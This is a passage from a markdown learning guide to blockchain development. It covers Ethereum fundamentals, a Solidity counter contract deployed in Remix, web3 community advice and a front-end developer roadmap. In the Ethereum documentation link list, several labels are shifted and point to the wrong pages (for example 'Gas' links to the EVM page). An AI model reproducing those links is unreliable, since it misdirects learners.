"In the Ethereum universe, there is a single, canonical Turing-complete(computational universal) computer (called the Ethereum Virtual Machine, or EVM) whose state everyone on the Ethereum network agrees on. Everyone who participates in the Ethereum network (every Ethereum node) keeps a copy of the state of this computer. Additionally, any participant can broadcast a request for this computer to perform arbitrary computation. Whenever such a request is broadcast, other participants on the network verify, validate, and carry out ("execute") the computation. This execution causes a state change in the EVM, which is committed and propagated throughout the entire network." (source: [ethereum.org documentation](https://ethereum.org/en/developers/docs))
In order to learn the basics of Ethereum, go through the [ethereum.org documentation](https://ethereum.org/en/developers/docs). Here are links for each section:
- [Intro to Ethereum](https://ethereum.org/en/developers/docs/intro-to-ethereum/)
- [Intro to Ether](https://ethereum.org/en/developers/docs/intro-to-ether/)
- [Intro to dapps](https://ethereum.org/en/developers/docs/dapps/)
- [Web2 vs. Web3](https://ethereum.org/en/developers/docs/web2-vs-web3/)
- [Accounts](https://ethereum.org/en/developers/docs/accounts/)
- [Transactions](https://ethereum.org/en/developers/docs/transactions/)
- [Ethereum Virtual Machine (EVM)](https://ethereum.org/en/developers/docs/blocks/)
- [Gas](https://ethereum.org/en/developers/docs/evm/) (skip the Opcodes section, we'll revisit that later)
- [Nodes and clients](https://ethereum.org/en/developers/docs/gas/)
- [Networks](https://ethereum.org/en/developers/docs/nodes-and-clients/)
- [Consensus mechanisms](https://ethereum.org/en/developers/docs/consensus-mechanisms/)
- [Governance / EIP process](https://ethereum.org/en/governance/)
- **Ethereum roadmap - Endgame**
[This graphic](https://github.com/dcbuild3r/blockchain-development-guide/blob/main/images/ethereum_roadmap.png) shows all the different changes which are being implemented to Ethereum in the upcoming years. It's not necessary to understand what this is all about, but it is good to know about. I suggest watching the video resource appended after the graphic to learn more about what these flowcharts mean.
- **Further reading**
- [Ethereum Whitepaper](https://ethereum.org/en/whitepaper/)
- [Why Proof of Stake - Vitalik Buterin](https://vitalik.ca/general/2020/11/06/pos2020.html)
#### Smart contracts
A smart contract is a program that runs on the Ethereum blockchain. It's a piece of code that has functions and data (state) which resides at a specific address on the Ethereum blockchain.
Smart contracts are a type of [Ethereum account](https://ethereum.org/en/developers/docs/accounts/) meaning that they have a balance and can send transactions over the network. They are deployed on the network and run as programmed, user accounts (externally-owned accounts, or EOAs) can interact with a smart contract by submitting transactions that interact with functions that are publicly accessible. Smart contracts can be used to define rules which are enforced via code, e.g. a smart contract that allows for two parties to swap their tokens (like Uniswap).
**How do I create a smart contract?**
The most popular smart contract programming language which targets the Ethereum virtual machine is [Solidity](https://docs.soliditylang.org/). It is a high-level language that was influenced by C++, Python, and Javascript and so its syntax looks familiar. Solidity is statically typed, supports inheritance, libraries, user-defined types, and more. Solidity is a compiled language, which means that before having a runnable smart contract, a Solidity program needs to be run through a compiler that generates a low-level interpretation which is called bytecode. Bytecode are instructions that the EVM can understand and execute.
There are other languages that can be used to target the EVM like [Vyper](https://vyper.readthedocs.io/en/stable/toctree.html) and [Fe](https://fe-lang.org/) that have their pros and cons, however, they don't have as robust development ecosystems and aren't as widely used by projects deployed in production.
Here's how a [simple counter program](https://solidity-by-example.org/first-app/) would look like in Solidity:
```js
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.10;
contract Counter {
uint private count;
// Function to get the current count
function get() public view returns (uint) {
return count;
}
// Function to increment count by 1
function inc() public {
count += 1;
}
// Function to decrement count by 1
function dec() public {
count -= 1;
}
}
```
In the beginning, you declare the version of Solidity you are using the `pragma solidity + version` keyword. To indicate the creation of a contract you write it using the `contract ContractName {}` form. Within the contract curly brackets, the logic of the program is declared. We then declare a simple private variable with the name `count` with unsigned integer type (meaning it can only hold positive integers). Private functions and state variables are only visible for the contract they are defined in and not in derived contracts. Afterward, we declare three different functions, one to retrieve the value held inside of the `count` variable, one to increase the variable's value by one, and the last one to decrement its value. The `public` keyword specifies that the function can be called by any address on the blockchain (be it a smart contract or a user-owned account). The `view` modifier specifies that the function doesn't alter the state within the contract (it only reads values already available). The `returns` keyword is used to specify the type of the object that is returned back by the function, unsigned integer type in the case of the `get()` function. Everything which is written after a `//` is considered a comment and is ignored by the Solidity compiler. Comments are used to make the code more readable and manageable, which is especially helpful if you are working with teams or revisit a codebase after some time. It also acts as documentation for what the code it is doing.
**How do I compile and deploy my first contract?**
In order to compile and deploy our first smart contract, we will use the Remix IDE which is a website where we can write smart contracts, compile them and deploy them on a local instance of the EVM. We can also interact with the local deployed smart contract to test out its functionality. To deploy our simple counter contract, go to [Remix](https://remix.ethereum.org/), add a new file in the contracts directory, name it `Counter.sol`, and copy-paste the code in the [counter example](https://solidity-by-example.org/first-app/). Now click on the second icon from the top in the selection bar on the left, it is the logo of the Solidity programming language and it symbolizes the Solidity compiler in Remix. In the compiler dropdown select 0.8.10 which is the Solidity version in our smart contract and click "Compile Counter.sol". After you have compiled your contract click on the third icon from the top, it should have the "Deploy & Run Transactions" name. Click "Deploy". After you have deployed, you should see a list item with "> COUNTER AT 0x.... (MEMORY). You've successfully compiled and deployed your first smart contract! Now that you have it deployed, you can interact with it by calling the `inc()` or `dec()` functions to increase or decrease the value of the `count` variable. You can call the `get()` function to retrieve the value of the `count` variable.
![remix](./images/remix.png)
We will go into a lot more depth on how smart contracts are programmed, tested, and deployed in the smart contract development section.
#### Web 2.0
Although blockchain developers build decentralized applications, the technologies used to build these applications overlap to a big extent. User interfaces for Dapps are hosted on the internet and are built with traditional web technologies. In order to interact with a smart contract, a user needs to submit a request to a server that hosts an application and that application needs to create a transaction, get the signature from a user via a web3 wallet like Metamask, and then submit the transaction to an Ethereum RPC. The transaction then goes to the mempool, gets picked up by a miner (PoW) / validator (PoS), gets executed and included in the blockchain, and the user interface updates once the blockchain emits an event with a successful call of a function inside of a smart contract. This is the usual flow that decentralized applications have.
Any blockchain developer that wants to build full-stack applications needs to know how the internet and its most important protocols work as well as how to build user interfaces for all the major platforms (web, mobile, etc). You can think of web3 as adding a native value layer to the internet, it also helps with social coordination and resource allocation with the decentralized autonomous organization structure. It is very helpful to know how the web and the existing technologies built on top of it work and understand how crypto and web3 work in order to create better applications.
I believe that even though you might not work with developing front-ends it is still good to know how they work on a foundational level as in almost all kinds of development you'll interface with the web in some form. A good learning roadmap for the basics of how web technologies work is the [roadmap.sh frontend](https://roadmap.sh/frontend) initial steps in the roadmap. It is also a must to learn how to version control your code, Git is the most popular version control and collaboration software along with GitHub / GitLab for hosting repositories and interacting with other coders.
![Frontend roadmap](./images/FE_roadmap.png)
- **Learning resources**
- [How does the internet work](https://www.youtube.com/watch?v=zN8YNNHcaZc)
- [CS50 HTTP lecture](https://www.youtube.com/watch?v=PUPDGbnpSjw) (the [CS50 course](https://www.edx.org/course/introduction-computer-science-harvardx-cs50x) on edX is a great intro into computer science)
- [freeCodeCamp](https://www.freecodecamp.org/) - Here you can learn the basics of how HTML, CSS and JS works. Unless you're planning to write frontend interfaces you won't need it, but it's still good to experiment and learn how it works.
#### What makes decentralization important?
In the web 2.0 world, we're used to have a main account on platforms like Google and Facebook which we use to log into other services. All of our data is hosted inside of centralized databases and our private information is used in advertising software to sell us products. In exchange for our data, we get free services. These big centralized entities have a lot of power and control over our daily lives through the products we use each and every day. This is the business model which has worked for the past few decades.
When you decentralize the services and become a sovereign user, you can't be de-platformed, censored, or exploited. As long as you have access to a computer and to the internet you can use any application running on a permissionless and decentralized blockchain. Nobody can block access to them fundamentally, because you can always run a node and submit a call a smart contract and submit a transaction in the blockchain network. Decentralized applications are still in their infancy and many technologies are still not mature enough to support mainstream adoption, however, there is a huge demand for these applications and the industry is evolving rapidly.
In a web3 world, users own their assets, their money, their identity, and their data. This allows for a better user experience fundamentally, and even practically once these technologies become mature enough to support the masses. You can eventually have applications like decentralized social networks where users own their content, artists and musicians can produce their artwork and sell it as NFTs and get revenue from royalties and better engaging with their audiences, you can have virtual worlds where people own their digital identity, their virtual items, and their land, etc. The possibilities in web3 are growing day by day and I think it is one of the most exciting technologies that humankind has ever devised. It unlocks so much potential.
### Web3 values
The web3 movement is one about creating a value layer for the internet where we can setup incentive structures for the betterment of society in order to make a fairer world where access to products and services is openly distributed, permissionless and accessible to everyone on the planet no matter their provenance.
There are many good initiatives like [Kernel](https://kernel.community/en/), [Gitcoin](https://gitcoin.co/), [GreenPill](https://greenpill.party/) and many others that try to help educate about and fund the new wave of public goods and inrastructure in order to create a better world. As a blockchain developer, it is good to get a feeling for why these systems are built out in the first place and the values the products and services we create embody so as to not recreate the centralized web2 world we currently have.
In order to learn more about web3 values and how we can create a fairer world, go over [Kernel's web3 lessons](https://kernel.community/en/learn/).
### Play around
Blockchain development might feel overwhelming, and frankly very intimidating when you are starting out. To remedy this feeling, I suggest you look at programming on blockchains like an adventure game. You can explore what is possible, experiment by creating small projects with technologies that you find interesting, looking at what other people are building and interacting with their applications, debate with various people about their favorite applications, technologies and get a feel for how everything works.
As you progress through this guide, you'll start going deeper into various different fields. There is a myriad of interesting primitives in web3 and types of applications you could build and so to pick what to specialize in from the get-go is very hard unless you have a clear goal in mind from the get-go which is quite rare. I personally think that trying everything that interests you if at least for a short while can get you a glimpse into that field and give you insight on whether you'd like to focus on that particular area. For this I suggest getting into different developer and research groups and talking about how is it like building those things, what are the types of problems you would be working on, how does one get better in that field, what is there to work on, etc. One of my favorite such groups is [Newt](https://twitter.com/wearenewt) which is Aave's experimentation branch. Newt is completely community-driven and tries to promote open-source experimentation where the community is welcome to contribute to existing experiments or create their own. Here you can meet like-minded developers, build cool projects, explore different areas of development and different fields within web3 such as DeFi, NFTs, and more. [DeveloperDAO](https://twitter.com/developer_dao) and [EthernautDAO](https://twitter.com/EthernautDAO) are also good developer communities where you can search for like-minded individuals and explore the possibilities of what's possible in web3, and potentially even getting full-time job offerings.
### Connect
Blockchain development is a fairly new field and so most information about how to build applications in web3 is available on the internet and not in universities and other educational institutions. This might make it a lonely endeavor, but it need not be! There are people all across the world learning how to build cool projects with these technologies and everyone is looking to learn from each other and make friends in the space. As mentioned before, join DAOs and groups like Newt, DeveloperDAO, EthernautDAO, etc, talk about your learning journey on Twitter and try to provide insight into your experience with learning these technologies. You're bound to find like-minded individuals with whom you can share your interests, it helps a lot with learning the material as when you have to explain a complex topic to a person without former knowledge, it forces you to understand your subject very well in order to explain it simply. Pair-programming or pair-learning is also a good way to cement new learnings. Personally, I found that making friends online that are also into blockchain development is what made it the most fun and engaging for me and is helping me stick with the material for longer periods of time than I otherwise would have.
Twitter is currently the platform where most builders, researchers, and creators share their insights in the realm of blockchain and web3, so it is almost a must if you want to keep up with the newest technologies. I also recommend to not overdoing social media as it can lead to a drastic decrease in productivity. It's a balance that needs to be achieved over time, a good tip is that whenever you want to check Twitter or Discord you have a clear goal in mind, e.g. goal: I want to learn what new gas optimizations have my friends come up with? I also recommend creating lists with different types of people so you can sort by the type of content you want to see (DeFi, NFTs, MEV, smart contracts, frontend, design, etc). Bookmarking is also a good feature if you want to revisit interesting tweets in the future.
Another great way to meet devs is to go to hackathons and conferences. If you can afford to go to events then definitely do, however, if you don't have enough funds there are oftentimes grants for first-time attendees through places like [PadawanDAO](https://twitter.com/PadawanDAO), and others. Usually asking around to volunteer will get you a free entrance and people are usually kind enough to pool funds to sponsor people looking to get into the space that doesn't have the means to afford to travel by themselves. In-person events like hackathons are a great way to develop your skills and meet people. It's where many projects that are popular today were started and the place where founders of projects usually meet for the first time. As for events worth going to in 2022, I suggest [Devconnect](https://twitter.com/EFDevconnect) (Amsterdam), [ETHPrague](https://twitter.com/EthPrague), [ETHCC](https://twitter.com/EthCC)/[ETHParis](https://twitter.com/ETHParis) and [Devcon](https://twitter.com/EFDevcon) (Bogota). Here is a [good list](https://docs.google.com/spreadsheets/d/1NEu_FCc1hnGAuRgPmbXXpf0h2lCrCOlMKbbFEqgkVDQ/edit#gid=0) with Ethereum-related events in 2022, there are also events on pretty much every continent and there are also small local events that different communities organize, so look for events near you that might be related to blockchain development in some way or start one yourself!
I also recently started creating a [Twitter list with blockchain devs](https://twitter.com/i/lists/1483458041412526084) that I think you should follow if you want to learn blockchain development. It is a running list so feel free to DM me devs I should add and I'll consider adding them to the list.
### Build
The next and final step to get started with blockchain development should be obvious by now, it is to actually start building! After you've gone through the introductory foundational material that I wrote in the sections above you are ready to get going with one of the specializations listed below. If you are not sure which one you're into yet, just go with full-stack blockchain development and you'll get to try a bit of everything! Start writing code, no matter how bad it is, and try to get feedback on it from devs that know more than you do. Go through the roadmap that I have specified below, learn a concept, take notes, build something around it, do some testing and move on. If there is something that catches your attention, then try building something with it and see where it takes you. Your own curiosity and interest are your best friend when learning blockchain development. You should constantly ask yourself why did the thing that I wrote worked and how I could make it better, if you can't come up with an answer you either ask someone for an explanation or for a code review. It is also good to review quality code written by other teams. If you are learning Solidity, for example, the best way to learn advanced Solidity is to read into production codebases like Aave v3, Uniswap v3, Balancer v2, etc. The same principle applies to other categories and specializations as well.
Once you build something, share it with the world (unless it's a very profitable MEV bot)! Sharing it on Twitter and different Discords will bring attention to what you're doing and you might get constructive feedback and/or meet new friends that are interested in what you are building. If you are building something more complex, try creating documentation for it or make some useful comments if you expect other people to read your code. It is also great to share code and make it publicly available on hosting platforms like GitHub to build a portfolio of projects which you can showcase in order to show other people when applying for job positions. I'll revisit how to get employment in web3 in a later section.
## Skill-based development
Now we get down to different specializations, before getting started looking at different paths you can take make sure you've gone through the [Foundational section](#general-foundation). I also suggest reading the introduction to each specialization in both the [skill-based development](#skill-based-development) and [application-based development](#application-based-development) categories so that you have a better idea of what's out there and what you might find interesting before going deeper into any specifical one. This section will focus on categorizing specializations in blockchain development with regard to the skillsets required within them.
### Front-end development
Front-end (FE) development is highly reminiscent of traditional web (“Web2”) development. This includes the technology stack involved in building out user interfaces connected to blockchain technology.
Just like in traditional environments, FE blockchain developers are expected to fetch data and interact with APIs in order to produce a seamless user experience on a decentralized application.
As a result of the overlap in these core competencies, front-end developers are able to leverage a mature ecosystem of tried and true languages, libraries, and various other tools that will be covered in this section.
Additionally, these similarities contribute to a much more frictionless onboarding process for developers who are new to frontend development. These developers are able to tap into a mature ecosystem composed of developers who eagerly impart their knowledge via platforms such as [StackOverflow](https://stackoverflow.com/). This also extends to the availability of well-produced tutorials and documentation for grasping these well-established technologies. Note, however, that this is not the norm in such a rapidly emergent ecosystem, such as Web3, which makes frontend development the most popular choice amongst those new to blockchain technology.
The key principles of front-development require knowing how to structure and style websites, how to make them dynamic with JavaScript and different frameworks, how to manage state within applications, basic design, how to fetch data from APIs and databases, and how to create good web3 user experiences regarding wallets and the interactions with the smart contract backend of your application. One of the biggest differences in web3 FE development is user-authentication as instead of logging in with your email and password or your Google account, you log in with your wallet using a third-party application like [Metamask](https://metamask.io/) or [WalletConnect](https://walletconnect.com/) and protocols like [ENS](https://ens.domains/) to display information about the user (provided they have an Ethereum domain). If a smart contract contains a state which represents past interactions with the application by the user, you also need to fetch historical data from the blockchain on-demand or maintain a local database with indexed data which is easily queriable by the FE of the application.
As a front-end blockchain developer you need to know what a Contract Application Binary Interface ([ABI](https://docs.soliditylang.org/en/v0.8.11/abi-spec.html)) is in order to be able to interact with smart contracts on the Ethereum blockchain or on an L2 like Optimism, Arbitrum, Starknet, or ZkSync which are Ethereum-based scaling solutions that we'll cover in the [L2 section](#l2). You also need to query data from various APIs to accurately display the price of various assets (if applicable), the user's balance of ERC20 tokens or NFTs, and various other data you might need from either the blockchain itself or an external database.
Another interesting feature of programming decentralized applications is the need for building applications that are not hosted on a centralized server, to remedy this problem many developers have their web interfaces open-sourced and have many instances of those interfaces on decentralized storage solutions like IPFS, Arweave, and others. In this way, if one of the servers hosting the interface to interact with the smart contracts goes down, users can interact with it from many other different places. It's also amazing that since the functions are able to be called by anyone, users can interact with decentralized applications from completely different frontends as long as they have the ABI, this allows for massive composability which we'll cover a bit later.
This roadmap will focus on the frontend technologies that I've seen are mostly used in blockchain development today. I've used the roadmap.sh frontend roadmap, a friend's tech stack, and my experience as a reference for creating this specialization. If you are a more experienced reader feel free to suggest pull requests to add/edit/remove content or you can suggest changes by DMing me on Twitter or Telegram (@dcbuild3r).
#### HTML, CSS, JS, Web APIs
The pillars of web development technologies are HyperText Markup Language (HTML), Cascading Style Sheets (CSS), JavaScript (JS), and web application programming interfaces (APIs).
[HTML](https://en.wikipedia.org/wiki/HTML) is the language that is used to structure websites, with HTML you can insert text, images, videos, create different sections for your website, create links to other sites, and more. [CSS](https://en.wikipedia.org/wiki/CSS) is a styling language that helps you edit how your HTML elements look, how they are displayed and how they are arranged on your screen. It is also what makes user interfaces responsive for different devices like mobile, tablet, laptop, desktop, and others by providing APIs which dynamically resize your HTML elements based on the width and height of the screen a specific user has. [JavaScript](https://en.wikipedia.org/wiki/JavaScript) is a programming language that makes your HTML elements dynamic, it allows for things like complex animations, dynamic formatting of elements depending on given inputs, state management within your application, much more utility thanks to its programmability, and more. HTML, CSS, and JavaScript are the only 3 technologies that browsers understand, the rest of the technologies mentioned in this specialization end up compiling to an optimized HTML, CSS, and JS bundle which the browser can process and interpret.
The best place to learn the basics of web development in my opinion is [freeCodeCamp](https://www.freecodecamp.org/) where you can do the lessons in the first two sections named "Responsive Web Design" and "JavaScript Algorithms and Data Structures". It says that each section takes about 300 hours each, but usually, you can do it in much less since it's a conservative estimate. After you've gone through these two sections and made the initial projects that are required to fulfill them you can move on to learning React.
#### React
In modern web development, you'll almost never write vanilla HTML, CSS, and JavaScript to build your websites. Web developers learn a view framework that helps them to better structure their code with components and also optimize the way in which components are rendered and how changes to the state of the application affect what the users see. The most popular web development framework is React with a wide margin compared to Vue.js. React was originally developed by the Facebook team, but was open-sourced early on and now it has thousands of contributors and many full-time maintainers who are constantly pushing the framework forward.
Most of the user interfaces for blockchain applications are programmed using React and there are many React component libraries that you can reuse from the community to perform common tasks like logging with an Ethereum wallet, switching networks, and also so-called React hooks libraries (i.e. [eth-hooks](https://github.com/scaffold-eth/eth-hooks)) which let you fetch different data like balance, block number, prices and more.
I believe that React is best learned from the official documentation, but there are also other resources for people that learn better with video content. Here is a list of React learning resources that I recommend:
- [React in 100 Seconds - Fireship](https://www.youtube.com/watch?v=Tn6-PIqc4UM)
- [React roadmap](https://roadmap.sh/react)
- [Official React documentation](https://reactjs.org/docs/getting-started.html)
- [awesome-react](https://github.com/enaqx/awesome-react) - This GitHub repository aggregates many useful resources for React developers, it has tutorials, tooling, component libraries, frameworks, design patterns, guidelines, and much more. It is a good place to look for inspiration and resources when using React.
- If you want a paid video course I can recommend either [ZTM's React course](https://www.udemy.com/course/complete-react-developer-zero-to-mastery/) or [Maximilian Schwarzmuller's React course](https://www.udemy.com/share/101Wby3@JDt64oz7fMQjMAWBtrmk5wuDfzeEWDYkQeRN1yCa5yjMEWG0cKPDILlqSqtSXEI7/). On Udemy there are sales periods every once in a while which allow you to buy courses for `$15` instead of `$200`, so wait for one of those, never buy for the full price.
- [freeCodeCamp React course on YT](https://youtu.be/bMknfKXIFA8)
- [Learn React for free](https://scrimba.com/learn/learnreact)
After you feel like you've understood how React works, you have learned about lifecycle methods, hooks, how to pass down data through props, how to use the Context API, etc. I recommend trying to build the front end of a web3 app like Uniswap or an NFT marketplace like OpenSea. To rapidly prototype the design I recommend using [tailwind.css](https://tailwindcss.com) and Chrome browser developer tooling to inspect the styles of the site you're trying to recreate. Also, don't forget to use CSS flexbox/grid where necessary. Try to simulate the data inside of these apps using hardcoded JSON objects.
#### Typescript
[Typescript](https://www.typescriptlang.org) is a superset of JavaScript which allows you to statically type JavaScript code. This means that you declare the types of variables (integer, string, ...). It allows for a better developer experience as the Typescript compiler can catch many errors ahead of time since it checks the types of the objects ahead of time. It also allows developers to tap into extra features on top of JavaScript which allows writing more expressive JavaScript. Remember that Typescript cannot be run by the browser and needs a compiler to convert TypeScript code into runnable JavaScript. Typescript is widely used by the web-development community thanks to its features that improve security, readability, allow for a better development experience inside of the IDE with autocompletion, and add cool new syntactic sugar on top of JavaScript.
I recommend going to the [Typescript documentation](https://www.typescriptlang.org/docs/handbook/intro.html), it is good to get into the habit of going to official documentation since they are usually the right place to visit if you are learning new technology. Once you have the basics down try building a simple application with it or refactor an existing application in a way that uses the technology that you are learning.
#### Next.js
[Next.js](https://nextjs.org) is a React framework that enables server-side rendering, static site generation, does smart bundling, route pre-fetching, and a lot more. Next.js is able to heavily optimize your websites by only loading what you need on-demand instead of having to load up the entire site at the beginning. It also allows for a much better experience with creating API routes thanks to its file-system routing feature, it optimizes images, it has Typescript support, it helps with i18n API internationalized routing, and a lot more.
**Learning resources:**
- [Next.js documentation](https://nextjs.org/docs)
- [awesome-nextjs](https://github.com/unicodeveloper/awesome-nextjs)
#### Moralis
[Moralis](https://moralis.io) is a web3 development platform that helps abstract away the pain of having to build all the backend infrastructure needed to run web3 applications from scratch. Moralis provides an easy-to-use API that lets you fetch any data that you want from various blockchains, handles web3 user authentication, allows you to listen to smart contract events in real time, gives you access to historical data, has support for cloud functions, and much more. If you've never worked with blockchains it is the best way to get onboarded and start building web3 applications, as the Moralis SDK is intuitive to use for anyone that has experience with JavaScript/TypeScript.
**Learning resources**
- [Moralis documentation](https://docs.moralis.io/moralis-server/getting-started)
- [Moralis YT channel](https://www.youtube.com/c/MoralisWeb3)
#### Web3 libraries
[Ethers.js](https://docs.ethers.io/) is one of the most popular libraries for interacting with the Ethereum Blockchain and its ecosystem. Smart contracts that are deployed on the Ethereum blockchain have functions that can be called externally by any other account on Ethereum, be it an externally owned account (EOA = user wallet) or another smart contract. Many of these functions require certain parameters to be fed into them, they also rely oftentimes on an external state like prices of tokens on the blockchain, balances of the user's wallet, and more. Ethers.js is what allows a user interface to call these functions, users can input certain information in the frontend of your application and that information can be put into the function call of the smart contract, after the transaction is broadcasted the EVM will try to execute that function call and if every check inside of the function doesn't give out any errors it will execute, otherwise, the transaction will revert.
Ethers.js is currently the most popular Ethereum library among developers, but there are alternatives like web3.js, web3.py, Brownie, and many others. The second most popular framework is web3.js and it is the Ethereum JavaScript library that has been around the longest. For a comparison of ethers.js and web3.js read [this article](https://moralis.io/web3-js-vs-ethers-js-guide-to-eth-javascript-libraries/) written by the Moralis developer team.
**Learning resources**
- [ethers.js documentation](https://docs.ethers.io/)
[Web3.js](https://web3js.readthedocs.io/) is a collection of libraries that allow you to interact with a local or remote ethereum node using HTTP, IPC or WebSocket. The web3 JavaScript library interacts with the Ethereum blockchain. It can retrieve user accounts, send transactions, interact with smart contracts, and more.
**Learning resources**
- [web3.js documentation](https://web3js.readthedocs.io/en/v1.7.1/getting-started.html)
#### Design
As a front-end developer, you need to focus on how your application looks and how it feels to use it. A big part of that is designed, before building a website you should prototype how you want it to look, design how your users will interact with your application, how will that fit with the use case of your application, and what you want to accomplish with it, how to make it so that your users like using it and more. UI/UX is a specialization of its own, but every single front-end developer should have strong foundations in UI/UX regardless. Most big teams will have designers which will prototype applications using tools like Figma, Framer Motion, and various other tools. As a front-end developer, your task is to turn those designs into functioning code and hook all of the components to the APIs and databases necessary as well as creating the functionality of the application.
One of the most popular tools to prototype and design websites is Figma, so every FE developer should know how to use the application.
**Learning resources**
- [freeCodeCamp Figma YT course](https://youtu.be/jwCmIBJ8Jtc)
#### Web3 templates
When you are building web3 applications you usually start with a template. A template is just a group of libraries, pre-built user interfaces, and another tooling that create a favorable environment to build your application. A lot of the initial hard work to set up a project can be reused across projects to save time and effort on building redundant infrastructure. Many web3 templates have support for smart contracts out of the box which is what you'll be interacting with most of the time as a front-end developer. It is good to know the basics of smart contracts and understand how to get a contract factory out of the ABI to call its methods within your user interface. That's the biggest overhead when building in web3 in comparison to being a frontend developer in web2 where you only have to care about fetching data from REST or GraphQL APIs.
You can build your own templates depending on your needs, or modify already existing ones. Popular web3 templates include
- [moralis-starters](https://docs.moralis.io/moralis-server/getting-started/boilerplate-projects)
- [scaffold-eth](https://github.com/austintgriffith/scaffold-eth)
- [create-eth-app](https://github.com/paulrberg/create-eth-app)
#### Tooling
As a developer, there are many tools you'll use to make building applications easier and more efficient, to collaborate on projects with other people, to manage dependencies, and much more. This is a short section on different tooling you'll find yourself using regularly.
**Package management**
If you've gotten this far in the front-end specialization you've certainly had to install packages like React, Next.js, tailwind.css, ethers.js, and many others. The most popular package managers in the JavaScript ecosystem are `npm` and `yarn`. Package managers allow you to keep track of which versions of which external code libraries your application uses as well as how the project's code is structured, how to run different tests, how to run your program, and various other miscellaneous tasks.
As you build more complex applications it is good to learn the depths of your package manager, how to structure `package.json` files, how to write scripts that automate the boring stuff, how to set up a CI/CD pipeline (we'll talk about this in a bit), and more.
- [Package management basics](https://developer.mozilla.org/en-US/docs/Learn/Tools_and_testing/Understanding_client-side_tools/Package_management)
- [npm](https://www.npmjs.com/)
- [yarn](https://yarnpkg.com/)
**Styling/Animation**
There are many CSS libraries and frameworks which modify the way in which you write CSS. There are libraries that allow you to write CSS within JavaScript, component libraries for React which have a lot of the styling done for you, animation libraries, and more. I'll mention a few of the most popular ones, feel free to suggest changes as I'm not an expert in the area.
- [styled-components](https://www.styled-components.com/) (CSS in JS)
- [Tailwind.css](https://tailwindcss.com/) (CSS framework)
- [Framer Motion](https://www.framer.com/motion/) (Animations framework)
- [Chakra UI](https://chakra-ui.com/) (component library)
- [Material UI](https://mui.com/) (component library)
- [Next UI](https://nextui.org) (component library)
- [Sass](https://sass-lang.com/) (CSS pre-processor)
- [PostCSS](https://postcss.org/) (CSS pre-,post-processor)
- [awesome-CSS](https://github.com/awesome-css-group/awesome-css) (CSS learning repo)
**Linting/Formatting**
A linter is a static code analysis tool used to flag programming errors, bugs, stylistic errors, and suspicious constructs and a code formatter makes sure that the code you write has a homogenous style structure and abides by the formatting rules of a specific programming language (i.e. [PEP8](https://www.python.org/dev/peps/pep-0008/) for Python). When you're writing code, it's easy to miss a space, a tab, a colon, an opening or closing bracket, or to write code with bad and inconsistent styling. That's where linters and formatters will come in handy as they automate the task, they can be configured to run on saving and on commit, so that badly styled code never gets into production or into a public repo. The most popular choices are:
- [Eslint](https://eslint.org/)
- [Prettier](https://prettier.io/)
**CI/CD**
CI/CD stands for continuous integration / continuous deployment, they are a set of tools that allow you to create automatic processes that execute whenever a change is made to the codebase usually hosted on the cloud so that the production servers running your application get automatically updated with the newly pushed code. These actions can also modify and run tests on the code before it gets pushed into production, if tests fail the commit or update will not go through and collaborators will get notified of this. Once projects become bigger and they have big teams of contributors a solid CI/CD pipeline is very important so as to maximize the security and correctness of code being pushed into production. Examples of popular CI/CD tooling are:
- [GitHub Actions](https://github.com/features/actions)
- [CircleCi](https://circleci.com/)
- [Husky](https://typicode.github.io/husky/#/)
**Testing**
A key part of development is mitigating how many bugs are inside of your application. To ensure that the code behaves as it is intended to we write [unit tests](https://en.wikipedia.org/wiki/Unit_testing), [integration tests](https://en.wikipedia.org/wiki/Integration_testing) or even [end-to-end tests](https://www.browserstack.com/guide/end-to-end-testing). Each kind of test focuses on a different part of the application lifecycle. Modern tooling like Cypress allows you to simulate all possible states of your application and simulate user flows, you can even record user session tests as if you were recording a real user going through your website. In web3 you will also be doing integration tests for smart contract interaction. You can test smart contracts using libraries like [Foundry](https://github.com/gakonst/foundry), [Hardhat](https://hardhat.org/) or [Truffle](https://trufflesuite.com/). Most of these tests will be written by a smart contract or full-stack developer, however, as a frontend developer, you need to test how the interactions with the contracts will influence the flow of the user interface of your application. You can write various tests in JavaScript with ethers.js and couple it with Cypress to write complex tests. The web3 app development lifecycle usually goes from locally deployed smart contracts and front-end, to testnets (live network environment but with non-valuable assets), and to mainnet (not necessarily Ethereum mainnet, it can be an L2 like Arbitrum, a sidechain like Polygon PoS, etc). On the smart contract, side development teams hire external security auditors to verify that the contracts are secure to use, we will cover this in-depth in the [smart contract development section](#smart-contract-development).
- [Cypress](https://www.cypress.io/)
- [Jest](https://jestjs.io/)
- [Mocha](https://mochajs.org/)
**ENS integration**
[ENS domains](https://ens.domains/) are human-readable domains for Ethereum addresses, the registrar for these domains is fully on-chain and the protocol is decentralizaed and governed by a DAO. ENS domains serve as an on-chain identity mechanism which many Ethereum users use to express themselves on-chain and to display information about themselves through ENS profile metadata containing contact information like email, Twitter, Discord or links to websites, a profile picture (NFT image metadata) and more. As a web3 front end developer you can tap into this registrar and display users' information once they've connected to your application with their web3 wallet.
The best way to get started with ENS is [their official documentation](https://docs.ens.domains/), here you can get a general understanding of the ENS protocol. For integrating ENS into your dapp, visit [this section](https://docs.ens.domains/dapp-developer-guide/ens-enabling-your-dapp). You need to perform 3 steps in order to support ENS within your application:
1. [Resolve ENS names](https://docs.ens.domains/dapp-developer-guide/resolving-names)
2. [Support reverse resolution](https://docs.ens.domains/dapp-developer-guide/resolving-names#reverse-resolution)
3. [Let users manage their ENS names](https://docs.ens.domains/dapp-developer-guide/managing-names)
If you are interested in how the on-chain parts of ENS work, check out the [smart contract development section](#smart-contract-development)
#### Further learning and development
By now you have learned a solid technology stack that can enable you to build all kinds of user interfaces for web3 apps. In order to really engrain these technologies, you need to build pet projects or join a team full-time, even if you only know a few of them you can join a team and get upscaled there as your learning will be supercharged by more experienced coworkers that will act as mentors most of the times. The front-end development landscape is constantly evolving new technologies will come and go, it is in your best interest to look at trends in the industry and try adapting them once they are a clear sign of them becoming adopted. You will keep improving your technology stack over time especially as you become more senior and you are able to reason why you want to use one tool over the other and how it fits into the needs of the applications that you are building.
Build, Build, Build! Try creating small projects that implement ideas you come up with and practice the technologies you want to master. Also, don't be shy to ask questions to other web3 developers, and form learning groups with your friends, or other industry members.
Also, read over the [Getting a Job](#getting-a-job) and [Mastery](#mastery) sections of this guide to get more insight into soft skills which are useful to learn to grow as a developer.
### Smart contract development
